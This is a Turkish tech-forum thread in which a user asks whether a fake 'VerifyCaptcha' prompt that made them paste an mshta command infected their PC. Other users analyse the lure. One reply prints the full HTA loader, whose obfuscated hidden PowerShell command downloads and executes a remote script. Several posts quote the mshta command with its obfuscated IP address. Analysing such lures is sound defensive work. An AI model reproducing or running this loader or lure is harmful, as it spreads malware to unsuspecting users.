Çözüldü Sahte VerifyCaptcha tarafından virüs gelmiş olabilir mi?

akiff0 · Bugün 16:32

windows + r yaptırıp mshta http://162.0xfc.0xc6.122/nw/exnw.dcm bunu yazdırdı nedir bu ? cmd açıldı bilgi sızdırmış olabilir mi ipye benziyor

weeha · Bugün 16:38

hocam tıkladım bir dosya indi başımıza iş aldıracaksınız

HakanXD · Bugün 16:49

akiff0 dedi:
Windows + r yaptırıp mshta http://162.0xfc.0xc6.122/nw/exnw.dcm bunu yazdırdı nedir bu? CMD açıldı bilgi sızdırmış olabilir mi IP'ye benziyor.

Yazdıysan sıkıntı, format atmani öneririm.

Lusadris · Bugün 16:50

Çok yüksek ihtimalle zararlı hocam. Powershell scripti çalıştırıyor.

Joaquim · Bugün 16:51

IP adresinin orta kısmını byte'a çevirmiş.

Bu bir link ve sahte bir dicom dosyası indiriyor.

mashta.exe ile indirdiği dosyayı direkt sistemde çalıştırıyor.

Virüse benziyor.

Arda Keçeci · Bugün 16:54

akiff0 dedi:
Windows + r yaptırıp mshta http://162.0xfc.0xc6.122/nw/exnw.dcm bunu yazdırdı nedir bu? CMD açıldı bilgi sızdırmış olabilir mi IP'ye benziyor.

Direk dosya indiriyor hocam:

VirusTotal taraması yaptım:VirusTotal

Bash:

<html>
<head>
 <script language="JScript">
 window.onload = function () {
 var shell = new ActiveXObject("WScript.Shell");

 var cmd = 'POwERShelL -"W" h -"CoMMaN"d "i"ex" (irm "h"tt"ps://f"er"ri"ou"njk"b.o"ne/hy"r"t".ob"b)"';

 shell.Exec(cmd);

 window.close();
 };
 </script>
</head>
<body>
</body>
</html>

İççindeyse bu kodlar var. Ne yaptığını çözemedim.

F4T1H · Bugün 16:55

VirusTotal

www.virustotal.com

temiz diyor ama güvenemedim sanırım şifreli dosyayı tarıyor.

Lusadris · Bugün 16:57

@Arda Keçeci, olay dosya değil. MSHTA ile bu dosyayı çalıştırıyor. Bu dosya da URL'den Powershell scriptini çekip çalıştırıyor. Asıl olay Powershell scriptinde. Tarayıcıdan gözükmüyor o da tabii. Şimdi bakamadım ama %99 zararlıdır.

akiff0 · Bugün 17:03

Lusadris dedi:
Çok yüksek ihtimalle zararlı hocam. Powershell scripti çalıştırıyor.

tam tarama yaptım bir şey bulamadı format atmalı mıyım

Lusadris · Bugün 17:04

@akiff0, içeriğini bilmediğim için net bir şey diyemem. Ama genel olarak fileless çalışan bir şeyse tespit edilmesi bayağı zor olur. Ben sizin yerinizde olsam atardım.

Çözüldü Sahte VerifyCaptcha tarafından virüs gelmiş olabilir mi?

Ayrıntılı düzenleme

akiff0

Yoctopat

Lusadris

weeha

Hectopat

HakanXD

Kilopat

Lusadris

Megapat

Joaquim

Hectopat

Arda Keçeci

Hectopat

F4T1H

Kilopat

VirusTotal

Lusadris

Megapat

akiff0

Yoctopat

Lusadris

Megapat

Benzer konular

Technopat Haberler

Yeni konular

Yeni mesajlar

Gizliliğinize önem veriyoruz